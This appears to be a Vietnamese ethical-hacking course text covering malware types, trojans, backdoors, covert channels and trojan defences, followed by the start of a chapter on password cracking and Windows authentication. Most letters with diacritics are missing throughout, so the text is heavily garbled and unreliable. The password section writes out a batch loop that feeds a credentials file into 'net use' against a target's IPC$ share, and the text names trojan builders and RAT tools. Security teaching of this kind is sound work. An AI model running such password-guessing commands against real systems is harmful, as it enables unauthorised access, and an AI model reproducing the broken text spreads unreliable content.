Trc khi phn tch cc dng ca malware. C mt iu cn c bit ch : C nhiu cch chia ra cc dng ca malware. C th theo tnh nng, phng thc hot ng hoc kh nng gy hi Mt malicious code c nh s khng hn nm trong mt dng c nh hay ni mt cch chnh xc hn l n thng l s kt hp ca mt hay nhiu dng c bn bn di. Mc ch ca vic ny l lm tng tnh a nng ca mt malicious code v tnh nng, a dng cng nh kh nng ln trnh trc cc chng trnh an ninh. Virus Virus l mt loi m c hi c kh nng t nhn bn v ly nhim chnh n vo cc file, chng trnh hoc my tnh. Nh vy, theo cch nh ngha ny virus my tnh phi lun lun bm vo mt vt ch ( l file d liu hoc file ng dng) ly lan. Cc chng trnh dit virus da vo c tnh ny thc thi vic phng chng v dit virus, qut cc file trn thit b lu tr, qut cc file trc khi lu xung cng, iu ny cng gii thch v sao i khi cc phn mm dit virus ti PC a ra thng bo pht hin ra virus nhng khng dit c khi thy c du hiu hot ng ca virus trn PC, bi v vt mang virus li nm my khc nn khng th thc thi vic xo on m c hi . Compiled Virus L virus m m thc thi ca n c dch hon chnh bi mt trnh bin dch n c th thc thi trc tip t h iu hnh. Cc loi boot virus nh (Michelangelo v Stoned), file virus (nh Jerusalem) rt ph bin trong nhng nm 80 l virus thuc nhm ny. Compiled virus cng c th l pha trn bi c boot virus v file virus trong cng mt phin bn. Worm Worm cng l mt chng trnh c kh nng t nhn bn v t ly nhim trong h thng tuy nhin n c kh nng t ng gi, iu c ngha l worm khng cn phi c file ch mang n khi nhim vo h thng. Nh vy, c th thy rng ch dng cc chng trnh qut file s khng dit c worm trong h thng v worm khng bm vo mt file hoc mt

vng no trn a cng. Mc tiu ca worm bao gm c lm lng ph ngun lc bng thng ca mng v ph hoi h thng nh xo file, to backdoor, th keylogger, Tn cng ca worm c c trng l lan rng cc k nhanh chng do khng cn tc ng ca con ngi (nh khi ng my, copy file hay ng/m file). Worm c th chia lm 2 loi:

Network Service Worm lan truyn bng cch li dng cc l hng bo mt ca mng, ca h iu hnh hoc ca ng dng. Sasser l v d cho loi su ny. Mass Mailing Worm l mt dng tn cng qua dch v mail, tuy nhin n t ng gi tn cng v ly nhim ch khng bm vo vt ch l email. Khi su ny ly nhim vo h thng, n thng c gng tm kim s a ch v t gi bn thn n n cc a ch thu nht c. Vic gi ng thi cho ton b cc a ch thng gy qu ti cho mng hoc cho my ch mail. Netsky, Mydoom l v d cho th loi ny.

Trojan Horse L loi m c hi c t theo s tch Nga thnh Troia. Trojan ng vai tr nh mt k gin ip di s ch o ca k tn cng. Trojan horse khng t nhn bn, n ly vo h thng vi biu hin rt n ho nhng thc cht bn trong c n cha cc on m vi mc ch gy hi. Trojan c th la chn mt trong 3 phng thc gy hi:

Tip tc thc thi cc chc nng ca chng trnh m n bm vo, bn cnh thc thi cc hot ng gy hi mt cch ring bit (v d nh gi mt tr chi d cho ngi dng s dng, bn cnh l mt chng trnh nh cp password) Tip tc thc thi cc chc nng ca chng trnh m n bm vo, nh sa i mt s chc nng gy tn hi (v d nh mt trojan gi lp mt ca s login ly password) hoc che du cc hnh ng ph hoi khc (v d nh trojan che du cho cc tin trnh c hi khc bng cch tt cc hin th ca h thng) Thc thi lun mt chng trnh gy hi bng cch np di danh mt chng trnh khng c hi (v d nh mt trojan c gii thiu nh l mt ch chi hoc mt tool trn mng, ngi dng ch cn kch hot file ny l lp tc d liu trn PC s b xo ht)

Ty vo mc ch m ta c th chia trojan ra mt s dng cn bn sau:


Remote Access Trojans (RATs) dng gi li hot ng h thng t xa Data-Sending Trojans dng tm kim v gi d liu n k xm phm Destructive Trojans dng xa v lm hng cc file trn h thng Denial-of-Service Trojans dng cho cc cuc tn cng t chi dch v Proxy Trojans dng to cc lung d liu ngm hoc cc cuc tn cng ln cc h thng khc FTP Trojans dng to mt FTP server trn my nn nhn v copy mt s d liu Security Software Disabler Trojans dng pht hin v ngng cc chng trnh dit virus.

Tracking Cookie L mt dng lm dng cookie theo di mt s hnh ng duyt web ca ngi s dng mt cch bt hp php. Cookie l mt file d liu cha thng tin v vic s dng mt trang web c th no ca web-client. Mc tiu ca vic duy tr cc cookie trong h thng my tnh nhm cn c vo to ra giao din, hnh vi ca trang web sao cho thch hp v tng ng vi tng web-client. Tuy nhin tnh nng ny li b lm dng to thnh cc phn mm gin ip (spyware) nhm thu thp thng tin ring t v hnh vi duyt web ca c nhn. Malicious Mobile Code L mt dng m phn mm c th c gi t xa vo chy trn mt h thng m khng cn n li gi thc hin ca ngi dng h thng . Malicious Mobile Code c coi l khc vi virus, worm c tnh l n khng nhim vo file v khng tm cch t pht tn. Thay v khai thc mt im yu bo mt xc nh no , kiu tn cng ny thng tc ng n h thng bng cch tn dng cc quyn u tin ngm nh chy m t xa. Cc cng c lp trnh nh Java, ActiveX, JavaScript, VBScript l mi trng tt cho malicious mobile code. Mt trong nhng v d ni ting ca kiu tn cng ny l Nimda, s dng JavaScript.

Kiu tn cng ny ca Nimda thng c bit n nh mt tn cng hn hp (Blended Attack). Cuc tn cng c th i ti bng mt email khi ngi dng m mt email c bng web-browser. Sau khi nhim vo my ny, Nimda s c gng s dng s a ch email ca my pht tn ti cc my khc. Mt khc, t my b nhim, Nimda c gng qut cc my khc trong mng c th mc chia s m khng bo mt, Nimda s dng dch v NetBIOS nh phng tin chuyn file nhim virus ti cc my . ng thi Nimda c gng d qut pht hin ra cc my tnh c ci dch v IIS c im yu bo mt ca Microsoft. Khi tm thy, n s copy bn thn n vo server. Nu mt web client c im yu bo mt tng ng kt ni vo trang web ny, client cng b nhim (lu rng b nhim m khng cn m email b nhim virus). Qu trnh nhim virus s lan trn theo cp s nhn. Virus Hoax L cc cnh bo gi v virus. Cc cnh bo gi ny thng np di dng mt yu cu khn cp bo v h thng. Mc tiu ca cnh bo virus gi l c gng li ko mi ngi gi cnh bo cng nhiu cng tt qua email. Bn thn cnh bo gi l khng gy nguy him trc tip nhng nhng th gi cnh bo c th cha m c hi hoc trong cnh bo gi c cha cc ch dn v thit lp li h iu hnh, xo file lm nguy hi ti h thng. Kiu cnh bo gi ny cng gy tn thi gian v quy ri b phn h tr k thut khi c qu nhiu ngi gi n v yu cu dch v.
Attacker Tool

L nhng b cng c tn cng c th s dng y cc phn mm c hi vo trong h thng. Cc b cng c ny c kh nng gip cho k tn cng c th truy nhp bt hp php vo h thng hoc lm cho h thng b ly nhim m c hi. Khi c ti vo trong h thng

bng cc on m c hai, attacker tool c th chnh l mt phn ca on m c (v d nh trong mt trojan) hoc n s c ti vo h thng sau khi nhim. V d nh mt h thng b nhim mt loi worm, worm ny c th iu khin h thng t ng kt ni n mt web-site no , ti attacker tool t site v ci t attacker tool vo h thng. Attacker tool thng gp l backdoor v keylogger

Backdoor l mt thut ng chung ch cc phn mm c hi thng tr v i lnh iu khin t cc cng dch v TCP hoc UDP. Mt cch n gin nht, phn ln cc backdoor cho php mt k tn cng thc thi mt s hnh ng trn my b nhim nh truyn file, d mt khu, thc hin m lnh, Backdoor cng c th c xem xt di 2 dng: Zoombie v Remote Administration Tool Zoombie (c th i lc gi l bot) l mt chng trnh c ci t ln h thng nhm mc ch tn cng h thng khc. Kiu thng dng nht ca Zoombie l cc agent dng t chc mt cuc tn cng DDoS. K tn cng c th ci Zoombie vo mt s lng ln cc my tnh ri ra lnh tn cng cng mt lc. Trinoo v Tribe Flood Network l hai Zoombie ni ting. Keylogger l phn mm c dng b mt ghi li cc phm c nhn bng bn phm ri gi ti hacker. Keylogger c th ghi li ni dung ca email, ca vn bn, user name, password, thng tin b mt, V d v keylogger nh: KeySnatch, Spyster. Rootkits l tp hp ca cc file c ci t ln h thng nhm bin i cc chc nng chun ca h thng thnh cc chc nng tim n cc tn cng nguy him. V d nh trong h thng Windows, rootkit c th sa i, thay th file, hoc thng tr trong b nh nhm thay th, sa i cc li gi hm ca h iu hnh. Rootkit thng c dng ci t cc cng c tn cng nh ci backdoor, ci keylogger. V d v rootkit l: LRK5, Knark, Adore, Hack Defender.

Phishing L mt hnh thc tn cng thng c th xem l kt hp vi m c hi. Phishing l phng thc d ngi dng kt ni v s dng mt h thng my tnh gi mo nhm lm cho ngi dng tit l cc thng tin b mt v danh tnh (v d nh mt khu, s ti khon, thng tin c nhn, ). K tn cng phishing thng to ra trang web hoc email c hnh thc ging ht nh cc trang web hoc email m nn nhn thng hay s dng nh trang ca Ngn hng, ca cng ty pht hnh th tn dng, Email hoc trang web gi mo ny s ngh nn nhn thay i hoc cung cp cc thng tin b mt v ti khon, v mt khu, Cc thng tin ny s c s dng trm tin trc tip trong ti khon hoc c s dng vo cc mc ch bt hp php khc.

2. Backdoor
Backdoor l mt chng trnh (program) hoc c lin quan n chng trnh, c hacker s dng ci t trn h thng ch, nhm mc ch cho anh ta truy cp tr li h thng vo ln sau. Mc ch ca backdoor l xa b mt cch minh chng h thng ghi nht k. N cng gip hacker cm c trng thi truy cp khi b qun tr vin pht hin v tm cch khc phc.

Khi to mt dch v (servce) mi l k thut c bn khi tho lun v Backdoor trong h iu hnh Windows. Trc khi ci t backdoor, hacker phi qut h thng mc tiu, tm nhng service ang chy. Hacker c th thm serice v t mt ci tn kn o hoc l mt dch v khng bao gi c s dng, v n c active th cng hoc hon ton b disable. K thut ny th c hiu qu hn, bi v khi kim tra li ca h thng, admin thng tm thy nhng th d tha trn h thng, to thnh nhng dch v khng c kim tra chc ch. K thut backdoor n gin nhng hiu qu: Hacker c th quay tr li my tnh b tn cng trong vi ln sau . Dch v do backdoor to ra thng c quyn truy cp cao (higher privileges), nh ti khon h thng (system account).

Remote Administration Trojans (RAT)


RAT l mt phn ca backdoor, c s dng bt tnh nng iu khin t xa, thng qua s tha thun ca my tnh. N cung cp nhng hm (function) c user s dng, v ti thi im mt cng (port) mng s c m trn my tnh nn nhn. Mt khi RAT c khi ng, n s thc thi vi tp tin, ng dng. Sau tc ng n registry key khi ng tin trnh v c khi chng li to ra nhng dch v s hu ca h thng. Khng ging nh backdoor thng thng, RAT mc vo h iu hnh ca my tnh nn nhn v lun ta thnh gi vi hai tp tin: tp tin pha client v tp tin pha server. Server file c ci t vo my tnh nn nhn, v client file c k t nhp s dng iu khin s tha hip ca h thng.

Overt channel v Covert channel?


Knh cng khai (overt channel) l knh c khi to mt cch hp php cc trng trnh c th giao tip vi nhau trong h thng hoc mi trng mng. Cc protocol l mt v d in hnh ca overt channel Knh n (covert channel) li khi to mt cch b mt i vi ngi s dng, cc chng trnh khng trong sang, s ly mi trng ny c th giao tip v trao i thng tin m khng cn c s cho php ca ngi s dng Knh n thng (c th) nm n di cc knh cng khai giao tip vi mi trng bn ngoi. V d: Dch v HTTP trn port 80 l dch v dnh cho giao tip web, hin th cc web page i vi overt channel. Nhng i vi covert channel s li dng dch v trn port gi thng tin khng cho php n cc web server. Mt covert channel cao cp hn s gi i thng tin ca n theo ng nh dng ca mt communication khc. V d cho dng ny c th l mt dch v SSH trn port 80 v thng tin gi trn ng truyn ca giao tip SSH s (c v) theo ng nh dng ca mt HTTP bnh thng (Tt nhin chng trnh pha SSH client & server s l mt chng trnh t ch).
Hacking Tool

Loki l mt cng c hack, cung cp giao tip dng lnh qua ICMP. T chng trnh ny hacker c th tin hnh thc thi cc lnh trn my tnh nn nhn.

3. Trojan l g?
Trojan l mt chng trnh c hi, ci trang thnh nhng th c v lnh mnh. Trojan thng c ti xung trong mt chng trnh khc, hoc gi ng dng. Mt khi c ci t vo my, n c th nh v lm h hng cp d liu, hoc lm li v chm h thng. Chng cng c th c s dng nh l mt im cht (launching point) trong k thut tn cng DDOS. Mt vi loi Trojan c th dng iu khin tp tin trn my tnh hy sinh (victim computer), qun l tin trnh, iu khin t xa command line, ghi li s g phm, quay phim mn hnh, khi ng hoc tt my. Mt k thut gi Trojan c th kt ni chnh n, tc l my tnh pht Trojan vi my tnh b nhim hoc b ly lan, trn mt knh IRC (Internet Relay Chat Dch v dng tr chuyn trn mng). Trojan thng gn vo mt chng trnh khc, v thng c ci t vo my tnh m ngi dng khng bit. Trojan c gi n h thng victim bng nhng cch nh: Instant Messenger (IM), IRC, nh km qua email, NetBIOS. Nhng chng trnh thng d b nhim Trojan thng mang mc ngha hp php nh: phn mm min ph (freeware), cng c dit spyware, ti u ha h thng (system optimizer), screen saver, music, picture, game, video. Tt c chng u c th cha Trojan nguy him khi bn ci t trn h thng. Nhng li mi gi cho chng trnh min ph, file nhc, phim, v ni dung c tnh hp dn, hoc khi dy tnh t m ca ngi dng (phim sex chng hn) u c th c ci t Trojan trong . Chng trnh ny sau khi truy cp c vo h thng, c c quyn truy cp, s tin hnh ph hy, hoc ra lnh thc thi cho my tnh. Bng di y m t mt s kiu Trojan v cc port thng c chng s dng giao tip trong mc tiu tn cng ca mnh.

Dng lnh netstat an trong ch CMD xem trng thi ca cc port nh th no.

4. Nhng kiu khc nhau ca Trojan


Trojan pht trin a dng nhiu th loi khc nhau. Di y xin lit k cho cc bn vi kiu hot ng ph bin ca Trojan.

Remote Access Trojans: c s dng iu khin t xa my tnh. Data-Sending Trojans: c s dng tm kim d liu trn h thng v gi qua cho hacker. Destructive Trojans: c s dng xa hoc lm hng tp tin trn h thng. Denial of Service Trojans: c s dng trong tn cng t chi dch v. Proxy Trojans: c s dng to thnh tunnel cho vic gi hoc khi chy mt chng trnh trn h thng victim. FTP Trojans: S dng to dch v FTP, sao copy ti nguyn tp tin.

Security software disabler Trojans: Dng dng nhng chng trnh antivirus.

Reverse Connect Trojan K thut ny cho php hacker truy cp vo my tnh bn trong mng ni b t bn ngoi. Hacker c th ci t mt Trojan n gin vo mng bn trong (internal network), v d nh Reverse www shell. Sau mt khon thi gian, Internal Server c gng truy cp n h thng ch master system, thc thi mt lnh no . Nu hacker c li trn Master System nhng on lnh c hi, n s c thc thi trn my tnh trong mng internal. Reverse WWW Shell s dng chun HTTP. N rt l nguy him, bi v rt kh pht hin, n trong ging nh mt client truy cp web t internal. Hnh di y v d v mt qu trnh Reverse Connect Trojan. Yuri l mt hacker, my tnh ca anh ta ang lng nghe port 80, tc l dch v web. Bng cch no , anh ta gi c chng trnh server.exe n cho my tnh ca Rebecca. Khi chng trnh server.exe c chy trn my ca Rebecca, n s gi thng bo v cho Yuri. Khi , Yuri s c ton quyn iu khin my ca Rebecca.

Hacking Tool

K thut tn cng ny bn c th s dng vi cng c Nuclear RAT Trojan. y l cng c gip bn to ra file server.exe nh v d trn, v ng thi iu khin my tnh nn nhn t xa, khi nn nhn ci t server.exe. K thut Wrapper Wrapper l mt gi phn mm c s dng nh km Tronjan. Wrapper gip lin kt mt tp tin bnh thng n Trojan. C tp tin bnh thng v trojan ny cng c t trong mt tp tin thc thi n gin v c ci t khi chng trnh c chy. Thng thng, game v nhng chng trnh c tnh hp dn (phim sex) c s dng l wrapper, bi v n khi gi tham vng ca con ngi. Vi cch ny, user khng ch n s tr tr ca tc x l h thng, trong khi trojan c ci vo my, user ch c th thy nhng chng trnh m mnh mun ci t. Di y l mt v d bn c th hiu r hn vn ny. Mt chng trnh chi c c kch thc 90Kb, khi c nh km thm trojan th kch thng tng ln 110Kb. Ngi dng bnh thng khng n s khc bit v dung lng ny. Hng sn xut tr chi khng bit sn phm ca mnh b nhim trojan ri truyn qua mng.

Hacking Tool

Graffiti l mt game vui nhn c ci trojan bng phng thc wrapper. Khi ngi dng bc vo th gii tr chi, cng l lc Trojan ny hot ng.

ELiTeWrap l mt chng trnh ca windows, vi tp tin exe. Chng trnh c th gip chng ta to ra qu trnh ci t chng trnh, vi cc bc nh chp nhn bn quyn, copy file, ci tv khng th thiu, l n gip chng ta gn mt trojan vo trong qu trnh ci t. IconPlus l chng trnh chuyn i nh dng gia cc loi icon khc nhau. Mt k tn cng c th nhp vo icon mt on m c, hoc mt trojan. Ngi dng hon ton khng nhn ra mnh ang chy mu trojan, m ch bit mnh ang chy ng dng. To v iu khin Trojan C vi cng c gip hacker to ra Trojan thuc s hu ca ring h. Nhng cng c ny (gi l toolkit) gip hacker khi to v ty chnh nhiu cho Trojan ca mnh. Toolkit ny thng nguy him, v c th gy tc dng ngc nu s dng khng ng cch. Trojan mi c to ra, i km vi nhiu li ch, v thng khng b pht hin bi cc chng trnh an nnh, v chng cha c d liu v mu trojan mi ny.
Hacking Tool

Mt vi cng c c th k tn nh Senna Spy Generator, Trojan Horse Construction Kit v2.0, Progenic Mail Trojan Construction Kit, v Pandoras Box.

5. Phng chng Trojan


Nhiu cng c thng mi ca phn mm chng Virus, cng nh pht hin cc loi spyware, trojan, backdor v m c hi khc. Phn mm ny thng bao gm chc nng l pht hin v xa b malware, tt nhin c nhiu cch thc hin khi xa b. Bi v nhiu tp tin b nhim bnh c lin quan n h thng, v d nh tp tin trong h iu hnh, nu xa b trit c th lm cho h thng khng hot ng. Ngoi ra, cc cng c gim st hot ng cng c t trong vic pht hin ra nhng chng trnh l ang hot ng trn my. im chnh trong c ch hot ng ca Trojan v Backdor l ci t mt chng trnh trn my tnh. V th cch tt nht trnh nhim trojan l khng nn cho php user bnh thng c c quyn ci t chng trnh ty . Di y l cc khuyn co dnh cho cc bn phng chng Trojan hiu qu.

Hn ch s dng chung my tnh, ci t mt khu bo v Khng m cc tp tin l khng r ngun gc, ch cc file c ui m rng: exe, bat,com, Khng vo cc trang web l, khng click vo cc ng link l Khng ci t cc phn mm l Qut cc port ang m vi cc cng c nh Netstat, Fport, TCPView Qut cc tin trnh ang chy vi Process Viewer, Whats on my computer, Insider Qut nhng thay i trong Registry vi MsConfig, Whats running on my computer Qut nhng hot ng mng vi Ethereal, WireShark Chy cc phn mm dit Trojan.

Hacking Tool

Fport s to mt bng bo co v tnh hnh hot ng ca giao thc TCP/IP trong mng, gip chng ta bit c nhng ng dng no ang hot ng kt ni n internet. TCPView l cng c c sn trong Windows, cng dng xem trng thi hot ng gi d liu TCP hoc UDP, bao gm vic truy cp mng, trao i d liu, a ch ngun ch ca gi tin. Tripwire l cng c dng tnh bng Hash cho tp tin. Tp tin ban u, qua s tnh ton ca Tripware bng mt thut ton no , s cho ra mt dy s. Bn nhn cng dng chng trnh tnh ton li cho tp tin nhn c. Nu hai tp tin khng trng hash th c th n b nh km trojan.

6. Tng kt
Kt thc bi hc ny bn cn nm r cc vn nh sau:

Khi nim v Trojan: Trojan l mt on code c cha trong mt phn mm, ng dng khc, n c ci t vo my tnh. Covert channel l g: Covert channel s dng giao tip trn nhng cng khng hp php ng dng c bn ca Covert channels l ICMP tunneling, reverse WWW shell. Khi nim v backdoor: Backdoor thng c s dng l mt phn ca Trojan. N c s dng to thnh mt ca sau b mt, dnh cho hacker quay tr li h thng vo ln sau. Trojan hot ng nh th no: iu cn thit nht l chng phi c ci t trn my tnh. Phng chng Trojan: Cch n gin nht l ci t mt chng trnh Antivirus vo my tnh.

/////////////

CHNG 8: SYSTEM HACKING


Trong cc chng trc, chng ta kho st qua qu trnh thu thp thng tin ca mc tiu cn tn cng. Nhng k thut nh Footprinting, Social engineering, Enumeration, Google Hacking c p dng cho mc ch truy tm thng tin.

n chng ny, bn bt u i vo qu trnh tn cng h thng tht s. Mc tiu ca bn by gi l r trc mt, bn phi tin hnh nhng k thut khc nhau lm sao vo c trong h thng , thc hin nhng vic m mnh mong mun, nh xa d liu, chy chng trnh trojan, keylogger

Qu trnh tn cng h thng

Hnh 8. 1: Quy trnh tn cng h thng Trc khi tip tc ni v System Hacking chng ta dnh cht thi gian cho vic tm hiu mt qu trnh tn cng h thng. Mc tiu pha trc ca chng ta l mt h thng my tnh. Cc bc tn cng, nh sp n, c th c lit k nh hnh v bn cnh. N gm 6 cng on nh sau:

1. Enumerate (lit k): Trch ra tt c nhng thng tin c th v user trong h thng. S 2. 3. 4. 5. 6.
dng phng php thm d SNMP c c nhng thng tin hu ch, chnh xc hn. Bn tm hiu v phng php SNMP trong phn trc. Crack: Cng on ny c l hp dn nhiu hacker nht. Bc ny yu cu chng ta b kha mt khu ng nhp ca user. Hoc bng mt cch no khc, mc tiu phi t ti l quyn truy cp vo h thng. Escalste (leo thang): Ni cho d hiu l chuyn i gii hn truy cp t user binh thng ln admin hoc user c quyn cao hn cho chng ta tn cng. Execute (thc thi): Thc thi ng dng trn h thng my ch. Chun b trc malware, keylogger, rootkit chy n trn my tnh tn cng. Hide (n file): Nhng file thc thi, file soucecode chy chng trnhcn phi c lm n i, trnh b mc tiu pht hin tiu dit. Tracks (du vt): Tt nhin khng phi l li du vt. Nhng thng tin c lin quan n bn cn phi b xa sch, khng li bt c th g. Nu khng kh nng bn b pht hin l k t nhp l rt cao.

Trong chng ny, bn s cng tri qua nhng cng ngh thc hin cc bc trn tn cng h thng. Qua chng ta s a ra nhng gii php chng li tn cng . Phn Enumeration c tho lun trong chng trc, nn s khng cp trong phn ny.

Phn 1: Cracking Passwords


1. Mt khu v cc kiu tn cng mt khu
Mt vi kiu password dng truy cp vo h thng. Cc k t dng lm mt khu c th ri vo cc trng hp sau.

Ch l ch ci. VD: ABCDJ Ch l s. VD: 457895 Ch l nhng k t c bit. VD: #$^@&* Ch ci v s. VD: asw04d5s Ch l s v k t c bit. VD: #$345%4#4 Ch ci ,s, v k t c bit. VD: P@ssw0rd

mnh ca mt khu ph thuc vo kh nng nhy cm ca hacker. Quy tc sau y, ngh ca Hi ng EC, phi c p dng khi bn to mt mt khu, bo v n chng li cc cuc tn cng.

Khng cha tn ti khon ngi dng Ngn nht phi 8 k t Phi cha cc k t t t nht ba trong s cc loi sau o C cha cc k t c bit/ o Cha ch s. o Ch ci vit thng o Ch ci vit hoa.

Mt hacker dng cc cch tn cng khc nhau tm password v tip tc truy cp vo h thng. Cc kiu tn cng password thng dng sau:

Hnh 8. 2: Cc kiu tn cng mt khu

Passive Online: Nghe trm s thay i mt khu trn mng. Cuc tn cng th ng trc tuyn bao gm: sniffing, man-in-the-middle, v replay attacks (tn cng da vo phn hi) Active Online: on trc mt khu ngui qun tr. Cc cuc tn cng trc tuyn bao gm vic on password t ng. Offline: Cc kiu tn cng nh Dictionary, hybrid, v brute-force. Non-Electronic: Cc cuc tn cng da vo yu t con ngi nh Social engineering, Phising

Passive Online Attacks Mt cuc tn cng th ng trc tuyn l nh hi (sniffing) tm cc du vt, cc mt khu trn mt mng. Mt khu l b bt (capture) trong qu trnh xc thc v sau c th c so snh vi mt t in (dictionary) hoc l danh sch t (word list). Ti khon ngi dng c mt khu thng c bm (hashed) hoc m ha (encrypted) trc khi gi ln mng ngn chn truy cp tri php v s dng. Nu mt khu c bo v bng cch trn,mt s cng c c bit gip hacker c th ph v cc thut ton m ha mt khu. Active Online Attacks Cch d nht t c cp truy cp ca mt qun tr vin h thng l phi on t n gin thng qua gi nh l cc qun tr vin s dng mt mt khu n gin. Mt khu on l tn cng. Active Online Attack da trn cc yu t con ngi tham gia vo vic to ra mt khu v cch tn cng ny ch hu dng vi nhng mt khu yu. Trong chng 6, khi chng ta tho lun v cc giai on Enumeration, bn hc c nhng l hng ca NetBIOS Enumeration v Null Session. Gi s rng NetBIOS TCP m port 139, phng php hiu qu nht t nhp vo Win NT hoc h thng Windows 2000 l on mt khu. Ci ny c thc hin bng cch c gng kt ni n h thng ging nh mt qun tr vin thc hin. Ti khon v mt khu c kt hp ng nhp vo h thng.

Mt hacker, u tin c th th kt ni vi ti nguyn chia s mc nh l Admin$, C$ hoc C:\Windows. kt ni ti cc a my tnh, a chia s, g lnh sau y trong Start > Run: \\ ip_address \ c$ Cc chng trnh t ng c th nhanh chng to ra file t in, danh sch t, hoc kt hp tt c c th c ca cc ch ci, s v k t c bit v c gng ng nhp vo. Hu ht cc h thng ngn chn kiu tn cng ny bng cch thit lp mt s lng ti a ca cc n lc ng nhp vo mt h thng trc khi ti khon b kha. (v d khi bn ng nhp vo mt trang web m bn nhp sai password 5 ln th ti khon bn t ng b kha li 1 ngy) Trong cc phn sau, chng ta s tho lun lm th no hacker c th thc hin vic t ng on mt khu cht ch hn, cng nh cc bin php i ph vi cc cuc tn cng nh vy. Performing Automated Password Guessing: (T ng on Mt Khu) tng tc on ca mt khu, hacker thng dng cng c t ng. Mt cch c qu trnh, d dng t ng on mt khu l s dng ca s lnh da trn c php chun ca lnh NET USE. to ra mt kch bn n gin cho vic on mt khu t ng, thc hin cc bc sau y: 1. To ra mt tn ngi dng n gin v tp tin mt khu bng cch s dng cc ca s notepad. Dng cc dng lnh to ra danh sch cc t in. V sau lu vo cc tp tin vo a C, vi tn l credentials.txt 2. S dng lnh FOR C:\> FOR /F token=1, 2* %i in (credentials.txt) 1. G lnh net use \\targetIP\IPC$ %i /u: %j s dng file credentials.txt c gng logon vo h thng chia s n trn h thng mc tiu

Bo V Chng Li Cc Hot ng on Mt Khu C hai vn tn ti l bo v chng li on mt khu v tn cng mt khu. C hai cch tn cng u rt thng minh to trng thi bt an khi ngi dng to mt khu ring ca h. Mt ngi s dng cng c th c chng thc (authenticated) v xc nhn (validated) bng cch kim tra. Trong yu cu hai hnh thc nhn dng (chng hn nh cc th thng minh (smart card) v mt khu) khi xc thc ngi dng. Bng cch yu cu mt ci g ngi dng c th c (smart card) v mt ci g m ngi dng bit (mt khu) , bo mt tng, v khng d dng tn cng .

Offline Attacks Cuc tn cng Offline c thc hin ti mt v tr khc hn l hnh ng ti my tnh c cha mt khu hoc ni mt khu c s dng. Cuc tn cng Offline yu cu phn cng truy cp vt l vo my tnh v sao chp cc tp tin mt khu t h thng ln phng tin di ng. Hacker sau c file v tip tc khai thc l hng bo mt. Bng sau minh ha vi loi hnh tn cng offline: Bng 8.1: Cc kiu tn cng Offline Type of Attack Dictionary attack Hybrid attack Characteristics N lc s dng mt khu t t in Thay th mt vi k t ca mt khu Example Password Administrator Adm1n1strator

Brute-force-attack

Thay i ton b k t ca mt khu

Ms!tr245@F5a

Dictionary Attack l cch tn cng n gin v nhanh nht trong cc loi hnh tn cng. N c s dng xc nh mt mt khu t thc t, v mt khu c th c tm thy trong t in. Thng thng nht, cuc tn cng s dng mt tp tin t in cc t c th, sau s dng mt thut ton c s dng bi qu trnh xc thc. Cc hm bm (hash) ca cc t trong t in c so snh vi hm bm ca mt khu ngi dng ng nhp vo, hoc vi cc mt khu c lu tr trong mt tp tin trn my ch. Dictionary Attack ch lm vic nu mt khu l mt thc th c trong t in. Nhng kiu tn cng ny c mt s hn ch l n khng th c s dng vi cc mt khu mnh c cha s hoc k hiu khc . Hybrid Attack l cp tip theo ca hacker, mt n lc nu mt khu khng th c tm thy bng cch s dng Dictionary Attack. Cc cuc tn cng Hybrid bt u vi mt tp tin t in v thay th cc con s v cc k hiu cho cc k t trong mt khu. V d, nhiu ngi s dng thm s 1 vo cui mt khu ca h p ng yu cu mt khu mnh. Hybrid c thit k tm nhng loi bt thng trong mt khu. Brute Force Attack l mt cuc tn cng bng thut ton brute-force, m mi c gng kt hp c th c ca ch hoa v ch thng, ch ci, s, v biu tng. Mt cuc tn cng bng thut ton brute-force l chm nht trong ba loi tn cng v c th kt hp nhiu k t trong mt khu. Tuy nhin, cch ny c hiu qu, cn c thi gian v sc mnh x l tt c. Noneelectronic Attacks Cc cuc tn cng nonelectronicor l cuc tn cng m khng s dng bt k kin thc k thut no. Loi tn cng c th bao gm cc k thut nh social engineering, shoulder surfing, keyboard sniffing, dumpster diving.

2. Microsoft Authentication
Microsoft xut ra hng lot cc giao thc thc dnh cho h iu hnh my khch v my ch, mi trng workstation hoc domain u p dng c. Nhng giao thc c th k ra nh trong hnh, km theo l nhng phin bn h iu hnh s dng n. Mi giao thc chng thc c mt cch m ha d liu khc nhau, v di m ha cng khc nhau. Bng 8.2 di y l bng thng tin m ha dnh cho cc loi chng thc c bn.

Hnh 8. 3: Cc giao thc chng thc ca Microsoft Bng 8.2:Thng tin chng thc c bn

Giao thc xc thc NTLM


S dng mt c ch thch thc-p ng (challenge-response) xc thc ngi dng v my tnh chy Windows Me hoc h iu hnh trc , hoc my tnh chy Windows 2000 hoc sau m khng phi l mt phn ca doamin. Mt ngi dng c thch thc (challenge) c cung cp mt s phn thng tin c nhn duy nht cho ngi s dng (response).

Hnh 8. 4: M hnh chng thc Challenge-Response Windows Server 2003 h tr ba phng php xc thc theo kiu challenge- response sau y:

1. 1.

LAN Manager (LM): c pht trin bi IBM v Microsoft s dng trong OS2 v Windows cho Workgroups (Windows 95, Windows 98 v Windows Me). y l hnh thc km an ton ca xc thc challenge-response v n l d b k tn cng nghe trm, v my ch chng thc ngi dng phi lu tr cc thng tin trong LMHash . 2. 2. NTLM version 1: Mt hnh thc an ton hn so vi kiu LM. N c s dng kt ni vi my ch chy Windows NT vi Service Pack 3 hoc sm hn. NTLMv1 s dng giao thc m ha 56-bit. My ch xc thc ngi dng vi bt k phin bn ca NTLM no, vic xc thc phi lu tr cc thng tin trong mt Hash NT. 3. 3. NTLM version 2: Hnh thc an ton nht c sn trong chng thc challengeresponse. Phin bn ny bao gm mt knh an ton bo v qu trnh xc thc. N c s dng kt ni vi my ch chy Windows 2000, Windows XP, v Windows NT vi Service Pack 4 hoc cao hn. NTLMv2 s dng m ha 128-bit m bo cc giao thc an ton. LM Authentication

